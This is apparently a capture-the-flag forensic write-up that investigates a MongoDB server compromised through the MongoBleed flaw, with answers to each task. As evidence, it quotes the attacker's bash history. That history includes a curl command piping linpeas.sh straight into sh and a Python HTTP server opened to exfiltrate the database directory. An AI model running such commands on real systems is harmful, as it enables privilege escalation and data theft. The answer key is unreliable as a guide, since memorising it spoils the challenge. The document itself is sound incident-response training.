Overview
You were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it’s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.
You have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.
About This Sherlock
This Sherlock provides hands-on experience involving forensics and incident response, including the MongoBleed Vulnerability.
MongoBleed Vulnerability
MongoBleed is a heap-memory disclosure vulnerability in the MongoDB Server. It arises in the server’s zlib compression handling logic, specifically in how it parses compressed network messages. By sending specially crafted messages with inconsistent length fields, an attacker can cause MongoDB to return uninitialized heap memory, potentially exposing sensitive in-memory data, without any authentication.
Key Characteristics:
- Type: Heap-memory disclosure vulnerability
- Component: zlib compression handling logic
- Attack Vector: Specially crafted compressed network messages with inconsistent length fields
- Impact: Exposure of uninitialized heap memory containing sensitive in-memory data
- Authentication Required: No authentication needed to exploit
Sherlock Statistics:
- Release Date: December 31, 2025
Investigation Environment
- Triage Package:
MangoBleed.zip(31 MB) - Target System: mongodbsync (secondary MongoDB server)
- Access Level: Root-level access provided by administrator
Task 1: CVE Identification
Question: What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?
This one can be googled: “MongoBleed CVE#”
Answer: CVE-2025-14847
Task 2: MongoDB Version Identification
Question: What is the version of MongoDB installed on the server that the CVE exploited?
┌ 2813308004@Fred uac-mongodbsync-linux-triage
└ $ type '.\`[root`]\var\log\mongodb\mongod.log' | sls 'build'
{"t":{"$date":"2025-12-29T05:11:47.713+00:00"},"s":"I", "c":"CONTROL", "id":23403, "ctx":"initandlisten","msg":"Build
Info","attr":{"buildInfo":{"version":"8.0.16"
Answer: 8.0.16
Task 3: Attacker IP Address
Question: Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE.
To identify the attacker’s remote IP address, we can review MongoDB events in the logs. The following event IDs are relevant for tracking connections:
| Event ID | Type | Description |
|---|---|---|
| 22943 | Connection Accepted | Logged when a client connects |
| 51800 | Client Metadata | Logged when a client sends driver/application info |
| 22944 | Connection Closed | Logged when a client disconnects |
The attacker’s IP address can be found in connection events. Example log entry showing the connection:
{"t":{"$date":"2025-12-29T05:27:07.006+00:00"},"s":"I", "c":"NETWORK", "id":22944, "ctx":"conn37515","msg":"Connection ended","attr":{"remote":"65.0.76.43:35952","isLoadBalanced":false,"uuid":{"uuid":{"$uuid":"8dc3110d-e9cb-4c78-bd4a-4cf9fbc703f6"}},"connectionId":37515,"connectionCount":0}}
Answer: 65.0.76.43
Task 4: Initial Exploitation Time
Question: Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event).
We can search the logs using the attacker’s IP address to find the first instance of it being seen:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ grep -n "65.0.76.43" \[root\]/var/log/mongodb/mongod.log| head -1
182:{"t":{"$date":"2025-12-29T05:25:52.743+00:00"},"s":"I", "c":"NETWORK", "id":22943, "ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35340","isLoadBalanced":false,"uuid":{"uuid":{"$uuid":"099e057e-11c1-46ed-b129-a158578d2014"}},"connectionId":1,"connectionCount":1}}
Answer: 2025-12-29 05:25:52
Task 5: Malicious Connection Count
Question: Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.
We can count all log entries containing the attacker’s IP address:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat '[root]/var/log/mongodb/mongod.log' | grep '65.0.76.43' | wc -l
75260
Answer: 75260
Task 6: Successful Remote Access Time
Question: The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access?
Looking at the auth.log, we can search for the attacker’s IP address to find where the brute force ends and a connection is accepted:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat '[root]/var/log/auth.log' | grep '65.0.76.43'
The successful connection is logged here:
2025-12-29T05:40:03.475659+00:00 ip-172-31-38-170 sshd[39962]: Accepted keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46062 ssh2
Answer: 2025-12-29 05:40:03
Task 7: Privilege Escalation Command
Question: Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt.
We can examine the attacker’s bash history to find the privilege escalation command:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat \[root\]/home/mongoadmin/.bash_history
ls -la
whoami
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
cd /data
cd ~
ls -al
cd /
ls
cd /var/lib/mongodb/
ls -la
cd ../
which zip
apt install zip
zip
cd mongodb/
python3
python3 -m http.server 6969
exit
The attacker used curl to download linpeas.sh (Linux Privilege Escalation Awesome Scripts) and executed it directly in memory by piping to sh.
Answer: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Task 8: Exfiltration Target Directory
Question: The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target?
Using the same bash history output from Task 7, we can see the attacker navigated to a specific directory and then started a Python HTTP server:
cd /var/lib/mongodb/
ls -la
cd ../
which zip
apt install zip
zip
cd mongodb/
python3
python3 -m http.server 6969
The attacker changed to /var/lib/mongodb/ and then started a Python HTTP server on port 6969, indicating this was the target directory for exfiltration.
Answer: /var/lib/mongodb